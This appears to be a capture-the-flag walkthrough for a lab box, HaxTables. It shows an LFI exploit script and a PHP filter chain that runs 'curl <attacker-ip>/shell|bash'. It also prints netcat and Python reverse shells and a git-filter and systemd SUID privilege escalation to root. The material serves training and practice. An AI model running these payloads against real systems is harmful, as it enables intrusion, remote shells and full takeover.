Scanning

> TARGET=10.129.183.183 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HaxTables
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• Domain: haxtables.htb
• Subdomain

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://haxtables.htb/" -H "Host: FUZZ.haxtables.htb"

000000051:   200        0 L      0 W        0 Ch        "api"
000000177:   403        9 L      28 W       284 Ch      "image"

LFI

• api.haxtables.htb exploitable

import requests
import json

json_data = {
    'action': 'str2hex',
    'file_url' : 'file:///etc/passwd'
}
response = requests.post('http://api.haxtables.htb/v3/tools/string/index.php',json=json_data)
print(bytearray.fromhex(json.loads(response.text)['data']).decode())

• Found: svc:x:1000:1000:svc:/home/svc:/bin/bash
• Enum the filesystem found the followings

# /var/www/html/index.php
# /var/www/image/utils.php
function git_commit()
{
    $commit = shell_exec('sudo -u svc /var/www/image/scripts/git-commit.sh');
    return $commit;
}

# /var/www/image/.git/index exits

Foothold: lfi2rce

• Check out the repo at /var/www/image/.git/index

> python lfi.py /var/www/image/.git/index | xxd -r -p

# spotted a file
actions/action_handler.php

• Checkout actions/action_handler.php

# > python e.py /var/www/image/actions/action_handler.php | xxd -r -p
<?php

include_once 'utils.php';

if (isset($_GET['page'])) {
    $page = $_GET['page'];
    include($page);

} else {
    echo jsonify(['message' => 'No page specified!']);
}

?>

• Check /var/www/html/handler.php

<?php
include_once '../api/utils.php';

if (isset($_FILES['data_file'])) {
    $is_file = true;
    $action = $_POST['action'];
    $uri_path = $_POST['uri_path'];
    $data = $_FILES['data_file']['tmp_name'];

} else {
    $is_file = false;
    $jsondata = json_decode(file_get_contents('php://input'), true);
    $action = $jsondata['action'];
    $data = $jsondata['data'];
    $uri_path = $jsondata['uri_path'];



    if ( empty($jsondata) || !array_key_exists('action', $jsondata) || !array_key_exists('uri_path', $jsondata)) 
    {
        echo jsonify(['message' => 'Insufficient parameters!']);
        // echo jsonify(['message' => file_get_contents('php://input')]);

    }

}

$response = make_api_call($action, $data, $uri_path, $is_file);
echo $response;

?>

• https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters
• Generate a php filter chain https://github.com/synacktiv/php_filter_chain_generator

# generate chain
> python php_filter_chain_generator.py --chain '<?= `curl http://<attacker-ip>/shell|bash ` ;?>'

# create a shell file
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <attacker-ip> 4444 >/tmp/f

# serve the shell file
> python3 -m http.server 80

# trigger
> curl http://haxtables.htb/handler.php -d '{"action":"","data":"","uri_path":"test@image.haxtables.htb/actions/action_handler.php?page=<payload>"}'

PE: www-data -> svc

• Check sudo rights

www-data@encoding:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on encoding:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on encoding:
    (svc) NOPASSWD: /var/www/image/scripts/git-commit.sh

• Check out /var/www/image/scripts/git-commit.sh

#!/bin/bash

u=$(/usr/bin/git --git-dir=/var/www/image/.git  --work-tree=/var/www/image ls-files  -o --exclude-standard)

if [[ $u ]]; then
        /usr/bin/git --git-dir=/var/www/image/.git  --work-tree=/var/www/image add -A
else
        /usr/bin/git --git-dir=/var/www/image/.git  --work-tree=/var/www/image commit -m "Commited from API!" --author="james <james@haxtables.htb>"  --no-verify
fi

• https://git-scm.com/book/en/v2/Customizing-Git-Git-Attributes
• https://git-scm.com/docs/gitattributes

# setup nc listener

# run the following on the target
> echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker-ip>\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" > /tmp/e.py
> chmod +x /tmp/e.py
> cd /var/www/image/
> git init

# specify the filter to apply
> echo '*.php filter=indent' > .git/info/attributes

# specifies the program used to perform the clean action
> git config filter.indent.clean /tmp/e.py

# trigger
> sudo -u svc /var/www/image/scripts/git-commit.sh

PE: svc -> root

• sudo rights

svc@encoding:~$ sudo -l
Matching Defaults entries for svc on encoding:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on encoding:
    (root) NOPASSWD: /usr/bin/systemctl restart *

• https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

svc@encoding:~$ echo -e '[Service]\nType=oneshot\nExecStart=chmod +s /bin/bash\n[Install]\nWantedBy=multi-user.target' > /etc/systemd/system/pe.service
svc@encoding:~$ sudo systemctl restart pe
svc@encoding:~$ bash -p
bash-5.1# id
uid=1000(svc) gid=1000(svc) euid=0(root) egid=0(root) groups=0(root),1000(svc)
bash-5.1# cat /root/root.txt